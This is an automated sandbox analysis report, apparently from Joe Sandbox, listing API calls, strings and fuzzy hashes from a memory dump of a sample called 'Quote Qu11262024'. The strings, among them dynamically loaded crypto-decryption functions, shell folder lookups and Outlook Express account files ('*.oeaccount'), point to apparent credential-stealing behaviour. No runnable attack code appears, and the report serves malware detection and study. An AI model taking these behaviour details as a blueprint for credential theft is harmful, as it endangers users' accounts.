                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 2152742572-0
                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 889583718-2036018995
                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`#v,00407A43,00000001,?,00000000,`#v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpy
                                                                                                    • String ID: `#v
                                                                                                    • API String ID: 3056473165-272240289
                                                                                                    • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                    • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D5C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D7A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D98
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408DA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                    • String ID: Arial
                                                                                                    • API String ID: 3853255127-493054409
                                                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 520177685-3817206916
                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                    APIs
                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                    • API String ID: 2238633743-192783356
                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
